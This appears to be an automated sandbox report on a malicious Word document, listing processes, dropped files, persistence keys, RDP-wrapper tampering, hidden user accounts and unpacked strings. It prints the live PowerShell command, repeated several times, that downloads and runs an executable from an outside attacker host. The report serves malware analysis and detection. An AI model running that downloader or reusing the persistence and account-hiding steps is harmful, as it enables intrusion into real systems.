Source: C:\Users\user\AppData\Local\Temp\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe 'C:\Users\user\AppData\Roaming\JhwfHBtD..exe'

Source: C:\Windows\System32\verclsid.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD2-48AA-11D2-8432-006008C3FBFC}\InprocServer32

Source: C:\Users\user\AppData\Local\Temp\images.exe

File written: C:\Program Files\Microsoft DN1\rdpwrap.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Directory created: C:\Program Files\Microsoft DN1
Source: C:\Users\user\AppData\Local\Temp\images.exe	Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\Users\user\AppData\Local\Temp\images.exe	Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB* source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: images.exe
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2100227357.0000000001FB0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103552908.0000000002420000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdb$ source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: microA[1].exe.0.dr, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.3.dr, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.10.dr, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 10.0.microA.exe.60000.0.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 10.2.microA.exe.60000.0.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.11.dr, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.2.microA.exe.60000.0.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.microA.exe.60000.0.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: microA.exe.12.dr, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.microA.exe.60000.0.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.2.microA.exe.60000.0.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: images.exe.16.dr, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.2.microA.exe.cb0000.3.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.microA.exe.cb0000.0.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.microA.exe.cb0000.3.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.microA.exe.cb0000.0.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 18.2.microA.exe.cb0000.3.unpack, h.cs	.Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Suspicious powershell command line found

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,

Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_00405C1F pushad ; retf 0029h
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_004081F4 push ss; retf
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_00407D9F push eax; iretd
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_004082B1 pushad ; retf 0029h
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_01E26920 push esp; retf
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_01E270C0 pushad ; retf
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_04E675DB push E807B45Eh; ret
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_04E63720 push 8B000001h; iretd
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_04E61B5A push dword ptr [eax-42000000h]; retf
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00235C1F pushad ; retf 001Dh
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00237D9F push eax; iretd
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_002381F4 push ss; retf
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_002382B1 pushad ; retf 001Dh
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00503455 push FFFFFFFCh; retf
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_01FE1B5A push dword ptr [eax-42000000h]; retf
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_01FE3720 push 8B000001h; iretd
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00265C1F pushad ; retf 001Ch
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00267D9F push eax; iretd
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_002681F4 push ss; retf
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_002682B1 pushad ; retf 001Ch
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_045B3720 push 8B000001h; iretd
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_045B1B5A push dword ptr [eax-42000000h]; retf
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_004011C0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_004011C0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0041C225 pushad ; retn 0041h
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_004174D1 push ebp; retf
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00417570 push ebp; retf
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_004011C0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_004011C0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0041C225 pushad ; retn 0041h
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_004174D1 push ebp; retf

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0040290E URLDownloadToFileW,ShellExecuteW,

Source: C:\Users\user\AppData\Local\Temp\microA.exe	File created: C:\ProgramData\images.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\microA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\microA.exe	File created: C:\Users\user\AppData\Local\Temp\microA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe	File created: C:\Program Files\Microsoft DN1\sqlmap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe	File created: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe	File created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\images.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe	Jump to dropped file
Source: C:\ProgramData\images.exe	File created: C:\Users\user\AppData\Local\Temp\images.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\microA.exe

File created: C:\ProgramData\images.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\images.exe

File created: C:\Windows\System32\rfxvmt.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\SysWOW64\reg.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Load

Source: C:\Users\user\AppData\Local\Temp\images.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts

Show sources

Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: microA.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: microA.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Local\Temp\microA.exe

File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete

Hides user accounts

Show sources

Source: C:\Users\user\AppData\Local\Temp\images.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList cIqnzxr

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: 25_2_03BBC2BB GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
